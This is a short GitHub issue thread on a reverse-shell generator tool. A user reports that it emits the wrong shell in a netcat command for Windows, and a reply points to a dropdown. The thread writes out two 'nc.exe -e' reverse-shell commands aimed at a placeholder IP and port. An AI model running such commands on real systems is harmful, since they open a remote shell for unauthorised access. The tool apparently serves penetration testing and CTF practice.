### ISSUE TITLE
nc.exe wrong command

### ISSUE THREAD

**Issue by NotScortator** [0dayCTF/reverse-shell-generator#92]
When you try to generate a nc.exe revshell. the command input is sometimes wrong. For example, it will output nc.exe -e sh 10.10.10.10 4444 when it should be using nc.exe -e cmd.exe 10.10.10.10 4444.

**Comment by rohitkumarankam** [comment]
## You can change the shell with dropdown options.
![image](https://user-images.githubusercontent.com/70012972/176994391-3a7c644c-8bfc-43de-9852-4642b0131376.png)
